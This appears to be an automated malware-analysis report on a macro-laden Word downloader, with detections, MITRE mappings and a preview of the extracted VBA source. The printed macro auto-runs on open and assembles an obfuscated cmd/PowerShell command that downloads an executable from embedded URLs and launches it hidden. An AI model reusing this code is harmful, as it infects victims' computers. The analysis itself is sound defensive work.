MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro that automatically executes upon opening the document. This macro utilizes the Shell() function to execute a command, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.Valyria-6922866-0' further supports its role as a downloader.
Heuristics 6
-
ClamAV: Doc.Downloader.Valyria-6922866-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6922866-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6567 bytes |
SHA-256: 27ee2830112938b3e1a17bdd0b637cc19311dcb72ecf7bb7b0c01444ce604732 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jjqAcCsVzOQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Month CStr("8963" + "Clfi" + "80" + "wT")
Month CStr("3505" + "6218" + "zYdSBzMt" + "LOOI")
Month CStr("rBilkf" + "KBzLLRZvh")
Month CStr("z" + "s" + "vZl" + "JNvX")
Month CStr("t" + "9552" + "kI" + "CblR")
Month CStr("246654939" + "162023883")
Shell CStr(XTzFkzTaQF) + CStr(YSInciNiUI) + nqzkoaD + puAaMFVD + MwtEZIBhiND + CStr(wznREhFFbnsIm) + CStr(OvEPizMUNKPNdK), CStr(vbHide)
Month CStr("vkdZGp" + "cv" + "5660" + "504240444")
Month CStr("Fz" + "fkZRPajvSdrAZ" + "402395061" + "cWW")
Month CStr("2505" + "94812061")
End Sub
Attribute VB_Name = "nIrnOpdpo"
Function nqzkoaD()
On _
Error _
Resume _
Next
Month CStr("Aj" + "54807151")
qOVOlTzIR = Chr(17 + 5 + 12 + 13 + 52) + "md" + " /V/" + Chr(11 + 3 + 8 + 9 + 36) + Chr(5 + 1 + 3 + 4 + 21) + "^se^" + "t I^O^b" + "=^ ^ " + "^ ^ " + " " + "^ " + "^ ^ ^"
Month CStr("N" + "H")
Month CStr("ELI" + "3009" + "vjPKvzlstjn" + "Lq")
JjNRBZfUQQT = " ^ " + "}}" + "{^h" + Chr(17 + 5 + 12 + 13 + 52) + "^" + "ta" + Chr(17 + 5 + 12 + 13 + 52) + "^};k" + "a^" + "er^b" + ";I"
Month CStr("E" + "pp" + "sjtK" + "T")
Month CStr("Ha" + "8674")
csIiUiY = "S" + "w^$" + "^ m^e^" + "t^I^-" + "^e^kovn" + "^I" + ";)I" + "S^w" + "^$ ^," + "^j^T^W" + "$(^e^l^" + "iF"
Month CStr("505645656" + "9947" + "4981" + "mDY")
Month CStr("3245" + "1092" + "138671089" + "350050640")
Month CStr("95133085" + "8965")
Month CStr("M" + "N" + "ADSvCrfQlz" + "9394")
Month CStr("95195421" + "mXD")
NEcBta = "^dao^l" + "n" + "wo^D." + "^SN" + "u${yrt^" + "{)^p" + "TM^$^" + " ni j^" + "T" + "W$"
Month CStr("2376" + "cMHqbTWid" + "Ih" + "479946264")
woDbI = "(" + "h" + Chr(17 + 5 + 12 + 13 + 52) + "aer" + "^o^f;^" + "'^e^x^e" + "^.^'" + "+^z^D" + "a^$" + "^+'" + "\'+" + Chr(17 + 5 + 12 + 13 + 52)
Month CStr("8873" + "6002" + "448641095" + "FInRTiHWm")
Month CStr("L" + "JBr" + "4896" + "V")
Month CStr("vXHp" + "188594286" + "OwFvrjLliqDWn" + "Ow")
Month CStr("5816" + "j" + "bkjcKQ" + "XvNkNFD")
Month CStr("RPYw" + "oWtkB" + "420247437" + "oY")
cUaujUPqFAi = "^i^" + "lb^" + "u^" + "p^:v" + "ne^$^"
Month CStr("ak" + "232908972" + "s" + "20714442")
Month CStr("u" + "Jrji" + "Rduw" + "nfH")
bzGEwzd = "=^I^S^" + "w^" + "$;'" + "9^3^2" + "'"
Month CStr("lff" + "znMCjZlvC")
Month CStr("8264" + "408298511" + "3686" + "b")
YlzhZQzjWk = " ^= " + "^" + "zDa$^;)" + "'^@" + "^" + "'" + "(ti" + "lp^S" + "."
Month CStr("332659622" + "VZK")
MjjNKo = "'f" + "TL^" + "j89W" + "k/^ln^" + ".e" + "l^ba" + Chr(17 + 5 + 12 + 13 + 52) + "re" + "si" + "r/" + "/^:^p^" + "tth@^4P" + "F^S^2" + "t0^0^" + "4"
nqzkoaD = qOVOlTzIR + JjNRBZfUQQT + csIiUiY + NEcBta + woDbI + cUaujUPqFAi + bzGEwzd + YlzhZQzjWk + MjjNKo
Month CStr("rcpu" + "15619119")
Month CStr("7574" + "7465" + "2313" + "302756700")
Month CStr("Tt" + "jnU" + "s" + "1111")
Month CStr("6975" + "XIQDHjm" + "zwZacbrdfipiZd" + "6794")
Month CStr("6561" + "301349976")
End Function
Function puAaMFVD()
On _
Error _
Resume _
Next
Month CStr("6054" + "zkNXCK")
Month CStr("103129436" + "Ur" + "lYiXaliFBEOzH" + "kN")
Month CStr("nHiZXCn" + "507228431")
Month CStr("jjNSaIomEJr" + "A")
iiWuW = "o/" + "^e^" + "p.s^l" + "^a^tiyi" + "d//^:"
Month CStr("jVGh" + "VXvm")
ABiRaNotYN = "p^tt^" + "h" + "^@K^H" + "k^S^S6" + "^Y" + "/^mo" + Chr(17 + 5 + 12 + 13 + 52) + ".^" + "a^u^h" + "^jn^" + "a" + "uy"
Month CStr("2862" + "XkFls")
Month CStr("1641" + "2262" + "jdFIUAbWohUw" + "8991")
Month CStr("393151650" + "q")
Month CStr("Drn" + "4088")
Month CStr("5982" + "KOZjvX" + "8100567" + "4682")
QCdlXVTvwc = ".w" + "w^w//^" + ":p^tth@" + Chr(11 + 3 + 8 + 9 + 36) + "V" + "^m" + "w^" + "O" + "^0^Z/m" + "^o" +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.